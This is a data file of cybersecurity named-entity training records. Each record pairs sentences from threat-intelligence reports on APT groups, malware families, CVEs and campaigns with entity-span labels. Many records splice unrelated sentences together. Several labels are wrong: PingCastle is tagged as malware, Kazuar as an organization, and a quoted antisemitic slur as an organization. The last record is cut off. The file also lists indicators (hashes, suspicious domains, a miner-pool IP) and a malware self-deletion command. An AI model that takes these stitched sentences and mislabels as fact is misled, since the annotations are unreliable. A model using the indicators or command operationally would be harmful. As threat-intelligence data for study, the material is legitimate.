{"id": "cyberner_stix_train_003719", "source": "cyberner_stix_train"}} {"text": "These examples , together with the HenBox app placed on a very specific third-party app store , point clearly to at least some of the intended targets of these malicious apps being Uyghurs , specifically those with interest in or association with terrorist groups . 
APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": {"MALWARE: HenBox": [[35, 41]], "THREAT_ACTOR: APT41": [[266, 271]], "ORGANIZATION: entities": [[301, 309]], "THREAT_ACTOR: espionage groups": [[450, 466]]}, "info": {"id": "cyberner_stix_train_003720", "source": "cyberner_stix_train"}} {"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"ORGANIZATION: NSA": [[68, 71]], "FILEPATH: document malware": [[300, 316]], "ORGANIZATION: Tibetan non-governmental organizations": [[336, 374]], "ORGANIZATION: NGOs": [[377, 381]], "ORGANIZATION: Falun Gong": [[403, 413]], "ORGANIZATION: Uyghur groups": [[418, 431]]}, "info": {"id": "cyberner_stix_train_003721", "source": "cyberner_stix_train"}} {"text": "According to the configuration pattern , these actions are registered to certain events : Sync configuration data , upgrade modules , and download new payload ( This uses transport protocol ZProtocol encrypted by AES/CBC/PKCS5Padding algorithm to communicate with the C & C server . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets . the loop code becomes simpler . 
What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others “ greedy Jew bastards . ”", "spans": {"THREAT_ACTOR: Flying Kitten": [[283, 296]], "ORGANIZATION: security industry": [[334, 351]], "THREAT_ACTOR: Charming Kitten": [[355, 370]], "THREAT_ACTOR: groups": [[394, 400]], "THREAT_ACTOR: threat actor": [[431, 443]], "THREAT_ACTOR: espionage": [[557, 566]], "ORGANIZATION: Bullock": [[642, 649]], "THREAT_ACTOR: Harrison": [[706, 714]], "ORGANIZATION: Biderman": [[743, 751]], "ORGANIZATION: greedy Jew bastards": [[765, 784]]}, "info": {"id": "cyberner_stix_train_003722", "source": "cyberner_stix_train"}} {"text": "Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": {"FILEPATH: iviewers.dll": [[87, 99]], "TOOL: DLL": [[118, 121]]}, "info": {"id": "cyberner_stix_train_003723", "source": "cyberner_stix_train"}} {"text": "] net . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy .", "spans": {"ORGANIZATION: Proofpoint": [[11, 21]], "MALWARE: MSIL payload": [[153, 165]], "ORGANIZATION: FireEye": [[168, 175]], "THREAT_ACTOR: admin@338": [[196, 205]], "ORGANIZATION: financial": [[290, 299]], "ORGANIZATION: economic": [[302, 310]], "ORGANIZATION: trade policy": [[317, 329]]}, "info": {"id": "cyberner_stix_train_003724", "source": "cyberner_stix_train"}} {"text": "] com also registered six other domains . 
Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation .", "spans": {"THREAT_ACTOR: APT41": [[162, 167]]}, "info": {"id": "cyberner_stix_train_003725", "source": "cyberner_stix_train"}} {"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": {"ORGANIZATION: Indian Army": [[124, 135]], "VULNERABILITY: Heartbleed vulnerability": [[238, 262]]}, "info": {"id": "cyberner_stix_train_003726", "source": "cyberner_stix_train"}} {"text": "These breaches involved the theft of internal data - mostly emails – that was later strategically leaked through multiple forums and propagated in a calculated manner almost certainly intended to advance particular Russian Government aims .", "spans": {"TOOL: emails": [[60, 66]]}, "info": {"id": "cyberner_stix_train_003727", "source": "cyberner_stix_train"}} {"text": "Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . 
In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group .", "spans": {"VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[87, 144]], "VULNERABILITY: CVE-2014-6332": [[147, 160]], "ORGANIZATION: Novetta": [[229, 236]], "MALWARE: Winnti": [[274, 280]], "MALWARE: malware": [[281, 288]]}, "info": {"id": "cyberner_stix_train_003728", "source": "cyberner_stix_train"}} {"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": {"MALWARE: malware": [[56, 63]], "MALWARE: PingCastle": [[118, 128]], "MALWARE: EternalBlue": [[133, 144]], "MALWARE: PIVY": [[186, 190]], "VULNERABILITY: zero-day": [[212, 220]], "VULNERABILITY: exploit": [[221, 228]]}, "info": {"id": "cyberner_stix_train_003729", "source": "cyberner_stix_train"}} {"text": "The code is not only obfuscated but also packed . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue . BARIUM is an APT actor known to be using the Winnti backdoor . 
Its wellknown that ransomware can be delivered via unremediated vulnerabilities , but many security teams are overwhelmed by the sheer number they are facing .", "spans": {"THREAT_ACTOR: APT10": [[50, 55], [264, 269]], "THREAT_ACTOR: threat actors": [[149, 162]], "THREAT_ACTOR: BARIUM": [[338, 344]], "MALWARE: Winnti backdoor": [[383, 398]], "MALWARE: ransomware": [[420, 430]]}, "info": {"id": "cyberner_stix_train_003730", "source": "cyberner_stix_train"}} {"text": "The server sends a command . for example , “ Get System Information ” .", "spans": {"FILEPATH: Get System Information": [[45, 67]]}, "info": {"id": "cyberner_stix_train_003731", "source": "cyberner_stix_train"}} {"text": "Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors .", "spans": {"VULNERABILITY: Nitris Exploit Kit": [[27, 45]], "VULNERABILITY: CottonCastle": [[67, 79]], "ORGANIZATION: aerospace companies": [[378, 397]], "ORGANIZATION: defense contractors": [[404, 423]]}, "info": {"id": "cyberner_stix_train_003732", "source": "cyberner_stix_train"}} {"text": "The loader has a very simple purpose , extract and run the “ core ” module of “ Agent Smith ” . The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign . 
During the execution stage , Dexphot writes five key files to disk : Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": {"MALWARE: Agent Smith": [[80, 91]], "THREAT_ACTOR: Domain Fronting APT29": [[295, 316]], "SYSTEM: Remote Services": [[408, 423]], "THREAT_ACTOR: Cloud Services APT29": [[426, 446]], "SYSTEM: Azure AD PowerShell": [[609, 628]]}, "info": {"id": "cyberner_stix_train_003733", "source": "cyberner_stix_train"}} {"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": {"THREAT_ACTOR: group": [[10, 15]], "ORGANIZATION: businesses": [[36, 46]], "MALWARE: FrozenCell masquerades": [[125, 147]], "ORGANIZATION: Facebook": [[190, 198]], "ORGANIZATION: WhatsApp": [[201, 209]], "ORGANIZATION: Messenger": [[212, 221]], "ORGANIZATION: LINE": [[224, 228]], "ORGANIZATION: LoveChat": [[235, 243]]}, "info": {"id": "cyberner_stix_train_003734", "source": "cyberner_stix_train"}} {"text": "Those are not the only system functions Triada modifies . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . 
The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related .", "spans": {"MALWARE: Triada": [[40, 46]], "VULNERABILITY: Flash zero day": [[99, 113]], "TOOL: email": [[400, 405]]}, "info": {"id": "cyberner_stix_train_003735", "source": "cyberner_stix_train"}} {"text": "Figure 3 : Loading core malicious code into the benign application Once the “ core ” module is extracted and loaded , the “ loader ” uses the reflection technique to initialize and start the “ core ” module . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . This can make detection and remediation more difficult . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": {"ORGANIZATION: bank": [[314, 318]], "THREAT_ACTOR: Trusted Relationship APT29": [[440, 466]], "SYSTEM: IT": [[483, 485]], "SYSTEM: cloud services": [[488, 502]], "SYSTEM: managed services providers": [[509, 535]]}, "info": {"id": "cyberner_stix_train_003736", "source": "cyberner_stix_train"}} {"text": "In addition to known generic malware ( such as : njRAT , Poison Ivy , XtremeRAT ) , the MoleRATs group has been known to develop its own custom tools such as DustySky , the MoleRAT Loader and Scote .", "spans": {"MALWARE: njRAT": [[49, 54]], "MALWARE: Poison Ivy": [[57, 67]], "MALWARE: XtremeRAT": [[70, 79]], "THREAT_ACTOR: MoleRATs": [[88, 96]], "MALWARE: DustySky": [[158, 166]], "MALWARE: MoleRAT": [[173, 180]], "MALWARE: Scote": [[192, 197]]}, "info": {"id": "cyberner_stix_train_003737", "source": "cyberner_stix_train"}} {"text": "We did not actively 
check each server to verify if they were indeed vulnerable , so it is possible that many of these public-facing SharePoint servers were not vulnerable or since patched .", "spans": {"TOOL: SharePoint": [[132, 142]]}, "info": {"id": "cyberner_stix_train_003738", "source": "cyberner_stix_train"}} {"text": "One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c , which is named internally as msdetltemp.dll .", "spans": {"THREAT_ACTOR: Sofacy": [[23, 29]], "TOOL: USBSTEALER": [[30, 40]], "FILEPATH: 8b238931a7f64fddcad3057a96855f6c": [[52, 84]], "FILEPATH: msdetltemp.dll": [[116, 130]]}, "info": {"id": "cyberner_stix_train_003739", "source": "cyberner_stix_train"}} {"text": "Allwinner has also been less transparent about the backdoor code . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . We found a new variant of the ShadowPad backdoor , the group ’s flagship backdoor , deployed using a new launcher and embedding numerous modules . 
This convinced the user it was safe to download files once logged in .", "spans": {"ORGANIZATION: Allwinner": [[0, 9]], "MALWARE: ShadowPad backdoor": [[250, 268]], "MALWARE: backdoor": [[293, 301]]}, "info": {"id": "cyberner_stix_train_003740", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : analytics-google.org .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: analytics-google.org": [[11, 31]]}, "info": {"id": "cyberner_stix_train_003741", "source": "cyberner_stix_train"}} {"text": "These strings , which are generated by the compiler when using specific compilation settings , means that the components of the exploits used with MiniDuke had to have been compiled independently from those described by FireEye .", "spans": {"MALWARE: MiniDuke": [[147, 155]], "ORGANIZATION: FireEye": [[220, 227]]}, "info": {"id": "cyberner_stix_train_003743", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-qau [ . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . Many of the capabilities discovered in Glimpse were also present in the malware analyzed in part one of this . It seems that the legitimate macro code is used to calculate some values in the spreadsheets , but the legitimate functions are changed to call the function that starts the infection process .", "spans": {"THREAT_ACTOR: APT28": [[30, 35]], "ORGANIZATION: rockers": [[52, 59]], "ORGANIZATION: dissidents": [[64, 74]], "MALWARE: Glimpse": [[153, 160]]}, "info": {"id": "cyberner_stix_train_003744", "source": "cyberner_stix_train"}} {"text": "Figure 1 : Landing page for phishing scheme asking for the victim ’ s signatory number and PIN using stolen branding from Bank Austria Because the actor delivered phishing links using the bit.ly URL shortener , we can access delivery statistics for this particular campaign . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 
24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . The group uses stolen data exfiltrated from victims to extort organizations .", "spans": {"SYSTEM: Bank Austria": [[122, 134]], "ORGANIZATION: (DHS)": [[312, 317]]}, "info": {"id": "cyberner_stix_train_003745", "source": "cyberner_stix_train"}} {"text": "Charger , however , uses a heavy packing approach which it harder for the malware to stay hidden , so it must compensate with other means . The infection vector is a spear-phishing email with a malicious attachment . Distribution of targets is another factor suggesting that these two malware families may be connected . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": {"MALWARE: Charger": [[0, 7]], "SYSTEM: Google Analytics API": [[359, 379]], "THREAT_ACTOR: a web skimmer": [[382, 395]]}, "info": {"id": "cyberner_stix_train_003746", "source": "cyberner_stix_train"}} {"text": "Conclusion The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used . Legacy system users may use their providers ’ virtual patches . 
It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": {"MALWARE: Asacub": [[23, 29]], "TOOL: gsecudmp": [[206, 214]], "TOOL: WCE": [[219, 222]], "THREAT_ACTOR: TG-3390": [[268, 275]], "THREAT_ACTOR: Harrison": [[429, 437]]}, "info": {"id": "cyberner_stix_train_003747", "source": "cyberner_stix_train"}} {"text": "This Windows malware loads the encrypted msctfp.dat file in a system folder , and loads each configuration value .", "spans": {"SYSTEM: Windows": [[5, 12]], "FILEPATH: msctfp.dat": [[41, 51]]}, "info": {"id": "cyberner_stix_train_003748", "source": "cyberner_stix_train"}} {"text": "Earworm has also on occasion installed additional tools onto infected computers for the purposes of keylogging and password capture .", "spans": {"THREAT_ACTOR: Earworm": [[0, 7]]}, "info": {"id": "cyberner_stix_train_003749", "source": "cyberner_stix_train"}} {"text": "The local privileges escalation backdoor code for debugging ARM-powered Android devices managed to make its way in shipped firmware after firmware makers wrote their own kernel code underneath a custom Android build for their devices , though the mainstream kernel source is unaffected . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure . Outlaw : 45.9.148.129:80 Miner pool . 
Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": {"SYSTEM: ARM-powered": [[60, 71]], "SYSTEM: Android": [[72, 79], [202, 209]], "THREAT_ACTOR: Outlaw": [[457, 463]], "IP_ADDRESS: 45.9.148.129:80": [[466, 481]], "TOOL: Miner pool": [[482, 492]], "THREAT_ACTOR: Threat actors": [[495, 508]]}, "info": {"id": "cyberner_stix_train_003750", "source": "cyberner_stix_train"}} {"text": "We have been unable to identify the infection vectors used for this second botnet , but the C&C servers it used had open directory listings , allowing us to retrieve files containing listings of victim IP addresses .", "spans": {"TOOL: C&C": [[92, 95]]}, "info": {"id": "cyberner_stix_train_003751", "source": "cyberner_stix_train"}} {"text": "Finally , the program removes itself by starting the following command : “ cmd /c DEL %path to self% “ The MD5 of the dropped file is f6f88caf49a3e32174387cacfa144a89 .", "spans": {"TOOL: cmd": [[75, 78]], "FILEPATH: f6f88caf49a3e32174387cacfa144a89": [[134, 166]]}, "info": {"id": "cyberner_stix_train_003752", "source": "cyberner_stix_train"}} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[143, 160]], "MALWARE: Lamberts toolkit": [[271, 287]], "MALWARE: Black Lambert": [[304, 317]], "VULNERABILITY: zero day": [[354, 362]], "VULNERABILITY: exploit": [[363, 370]], "VULNERABILITY: CVE-2014-4148": [[373, 386]]}, "info": {"id": "cyberner_stix_train_003753", "source": "cyberner_stix_train"}} {"text": "It is still under active development , with at least 5 different versions of the Trojan released within the last 5 months ( June - November 2019 ) . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0 , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {"THREAT_ACTOR: CIA's": [[153, 158]], "THREAT_ACTOR: UMBRAGE": [[183, 190]], "THREAT_ACTOR: Dragonfly": [[400, 409]], "THREAT_ACTOR: Dragonfly 2.0": [[414, 427]]}, "info": {"id": "cyberner_stix_train_003754", "source": "cyberner_stix_train"}} {"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . 
In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: Zyklon": [[10, 16]], "VULNERABILITY: CVE-2017-8759": [[49, 62]], "THREAT_ACTOR: REDBALDKNIGHT": [[75, 88]], "FILEPATH: decoy documents": [[199, 214]]}, "info": {"id": "cyberner_stix_train_003755", "source": "cyberner_stix_train"}} {"text": "This section contains the details of the c2 domain ( khanji.ddns.net ) .", "spans": {"TOOL: c2": [[41, 43]], "DOMAIN: khanji.ddns.net": [[53, 68]]}, "info": {"id": "cyberner_stix_train_003756", "source": "cyberner_stix_train"}} {"text": "Monitoring the command and control ( C & C ) servers used by Bouncing Golf , we ’ ve so far observed more than 660 Android devices infected with GolfSpy . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes . On August 1, 2018 , the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig . 
The attackers work from computers with Chinese and Korean language configurations .", "spans": {"MALWARE: Bouncing Golf": [[61, 74]], "SYSTEM: Android": [[115, 122]], "MALWARE: GolfSpy": [[145, 152]], "ORGANIZATION: Department of Justice": [[336, 357]], "THREAT_ACTOR: FIN7": [[441, 445]], "THREAT_ACTOR: attackers": [[467, 476]], "SYSTEM: computers with Chinese and Korean language configurations": [[487, 544]]}, "info": {"id": "cyberner_stix_train_003757", "source": "cyberner_stix_train"}} {"text": "In order to establish remote tunneling , the actor delivered more tools , executing with command-line parameters .", "spans": {}, "info": {"id": "cyberner_stix_train_003758", "source": "cyberner_stix_train"}} {"text": "To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": {"TOOL: Lamberts toolkit": [[69, 85]], "TOOL: Black Lambert": [[102, 115]], "VULNERABILITY: zero day exploit": [[152, 168]], "VULNERABILITY: CVE-2014-4148": [[171, 184]], "ORGANIZATION: Dragos": [[187, 193]]}, "info": {"id": "cyberner_stix_train_003759", "source": "cyberner_stix_train"}} {"text": "Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"THREAT_ACTOR: group": [[16, 21]], "TOOL: email credentials": [[76, 93]], "TOOL: personal information": [[96, 116]], "MALWARE: PIVY": [[179, 183], [445, 449]], "ORGANIZATION: chemical makers": [[257, 272]], "ORGANIZATION: government agencies": [[275, 294]], "ORGANIZATION: defense contractors": [[297, 316]], "THREAT_ACTOR: attackers": [[387, 396]], "VULNERABILITY: zero-day": [[404, 412]]}, "info": {"id": "cyberner_stix_train_003760", "source": "cyberner_stix_train"}} {"text": "SHA256 9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740 .", "spans": {"FILEPATH: 9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740": [[7, 71]]}, "info": {"id": "cyberner_stix_train_003761", "source": "cyberner_stix_train"}} {"text": "The high infection rate for this target is likely because of its access to technology and information related to other Indian government organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_003762", "source": "cyberner_stix_train"}} {"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . 
These threats are capable of opening a back door and stealing information from victims' computers .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[4, 21]]}, "info": {"id": "cyberner_stix_train_003763", "source": "cyberner_stix_train"}} {"text": "South Korea nexus Fallout Team ( aka Darkhotel ) has used spoofed software updates on infected Wi-Fi networks in Asian hotels , and Duqu 2.0 malware has been found on the networks of European hotels used by participants in the Iranian nuclear negotiations .", "spans": {"THREAT_ACTOR: Fallout Team": [[18, 30]], "THREAT_ACTOR: Darkhotel": [[37, 46]], "TOOL: Wi-Fi networks": [[95, 109]], "MALWARE: Duqu 2.0": [[132, 140]]}, "info": {"id": "cyberner_stix_train_003764", "source": "cyberner_stix_train"}} {"text": "Truvasys is a collection of modules written in the Delphi programming language , a variant of Pascal . Like BlackEnergy ( a.k.a. Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": {"TOOL: Truvasys": [[0, 8]], "TOOL: Pascal": [[94, 100]], "MALWARE: BlackEnergy": [[108, 119]], "THREAT_ACTOR: Sandworm": [[129, 137]], "THREAT_ACTOR: Quedagh": [[140, 147]], "MALWARE: Potao": [[152, 157]]}, "info": {"id": "cyberner_stix_train_003765", "source": "cyberner_stix_train"}} {"text": "While not conclusive , it is intriguing that the same IP was observed hosting a domain ostensibly registered in Gaza AND the command and control domain associated with a series of targeted attacks leveraging Palestinian Authority -themed decoy documents referencing Gaza .", "spans": {"ORGANIZATION: Palestinian Authority": [[208, 229]]}, "info": {"id": "cyberner_stix_train_003766", "source": "cyberner_stix_train"}} {"text": "Some were only 3 bytes long , containing strings such as “ ddd ” and “ 333 ” , or were otherwise corrupted . 
Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility .", "spans": {"ORGANIZATION: Bayer pharmaceutical": [[172, 192]], "THREAT_ACTOR: Winnti": [[218, 224]], "THREAT_ACTOR: APT16": [[241, 246]], "ORGANIZATION: government agency": [[274, 291]], "ORGANIZATION: media organizations": [[323, 342]]}, "info": {"id": "cyberner_stix_train_003767", "source": "cyberner_stix_train"}} {"text": "XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . To understand its capabilities , the macro code has been isolated and analyzed in detail .", "spans": {"MALWARE: XLoader": [[0, 7]], "SYSTEM: Android": [[8, 15]], "ORGANIZATION: Pakistani businessmen": [[343, 364]], "TOOL: macro": [[421, 426]]}, "info": {"id": "cyberner_stix_train_003768", "source": "cyberner_stix_train"}} {"text": "Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . 
This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"ORGANIZATION: Banks": [[0, 5]], "MALWARE: spearphishing emails": [[230, 250]], "TOOL: emails": [[403, 409]], "FILEPATH: Microsoft Word attachment": [[417, 442]], "VULNERABILITY: CVE-2017-0199": [[475, 488]], "MALWARE: ZeroT Trojan": [[503, 515]], "MALWARE: PlugX Remote Access Trojan": [[547, 573]], "MALWARE: RAT": [[576, 579]]}, "info": {"id": "cyberner_stix_train_003769", "source": "cyberner_stix_train"}} {"text": "Traps blocks the macro-ladened remote templates as Suspicious macro detected , as well as Zebrocy and Cannon payloads as Suspicious executable detected .", "spans": {"TOOL: macro": [[62, 67]], "MALWARE: Zebrocy": [[90, 97]], "MALWARE: Cannon": [[102, 108]]}, "info": {"id": "cyberner_stix_train_003770", "source": "cyberner_stix_train"}} {"text": "Some of the settings include : The URL of the C & C server Service wake-up intervals Important package names Accessibility permissions status Lockdown screen status Recording status SMS app status Kill switch status Stealth To keep its resources safer and make analysis more difficult for researchers , TrickMo uses an obfuscator to scramble the names of its functions , classes and variables . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . 
Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"MALWARE: TrickMo": [[303, 310]], "TOOL: DarkPulsar": [[395, 405]], "TOOL: backdoor": [[476, 484]], "MALWARE: sipauth32.tsp": [[493, 506]], "THREAT_ACTOR: HELIX KITTEN actors": [[584, 603]], "ORGANIZATION: personnel": [[739, 748]]}, "info": {"id": "cyberner_stix_train_003771", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "THREAT_ACTOR: TG-3390": [[175, 182]], "VULNERABILITY: CVE-2011-3544": [[197, 210]], "MALWARE: HTTPBrowser backdoor": [[278, 298]], "VULNERABILITY: CVE-2010-0738": [[305, 318]], "MALWARE: JBoss": [[340, 345]], "VULNERABILITY: exploit": [[446, 453]]}, "info": {"id": "cyberner_stix_train_003772", "source": "cyberner_stix_train"}} {"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . 
The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"ORGANIZATION: Mandiant": [[28, 36]], "THREAT_ACTOR: FIN7": [[51, 55]], "MALWARE: services.exe": [[132, 144]], "TOOL: CARBANAK": [[156, 164]], "THREAT_ACTOR: admin@338": [[179, 188]], "ORGANIZATION: financial": [[217, 226]], "ORGANIZATION: policy organizations": [[231, 251]], "TOOL: emails": [[291, 297]], "ORGANIZATION: audiences": [[340, 349]]}, "info": {"id": "cyberner_stix_train_003773", "source": "cyberner_stix_train"}} {"text": "Reverse engineering both the word documents ( Uri Terror Report.doc & mha-report.doc ) exhibited similar behaviour except the minor difference mentioned below .", "spans": {"FILEPATH: Uri Terror Report.doc": [[46, 67]], "FILEPATH: mha-report.doc": [[70, 84]]}, "info": {"id": "cyberner_stix_train_003774", "source": "cyberner_stix_train"}} {"text": "Each bitmap resource is extracted , stripped of the first 0x428 bytes ( BMP headers and garbage data ) , and combined into one file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia . Features : The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": {"THREAT_ACTOR: APT33": [[178, 183]]}, "info": {"id": "cyberner_stix_train_003775", "source": "cyberner_stix_train"}} {"text": "Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . 
Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": {"ORGANIZATION: Kazuar": [[0, 6]], "VULNERABILITY: exploit": [[171, 178]], "VULNERABILITY: kit Niteris": [[179, 190]], "MALWARE: Corkow": [[206, 212]]}, "info": {"id": "cyberner_stix_train_003776", "source": "cyberner_stix_train"}} {"text": "Some anti-virus products can limit execution to only the highest reputation files , stopping a wide range of untrustworthy code from gaining control .", "spans": {}, "info": {"id": "cyberner_stix_train_003777", "source": "cyberner_stix_train"}} {"text": "Before Google shut it down , it installed more than 50,000 fraudulent apps each day , displayed 20 million malicious advertisements , and generated more than $ 300,000 per month in revenue . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples . Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks . This string is the schema that will be filled with the victim info , decoding this string will give us the following .", "spans": {"ORGANIZATION: Google": [[7, 13]], "THREAT_ACTOR: Lazarus Group": [[217, 230]], "TOOL: compromised infrastructure": [[236, 262]], "THREAT_ACTOR: Elfin": [[339, 344]], "THREAT_ACTOR: Shamoon": 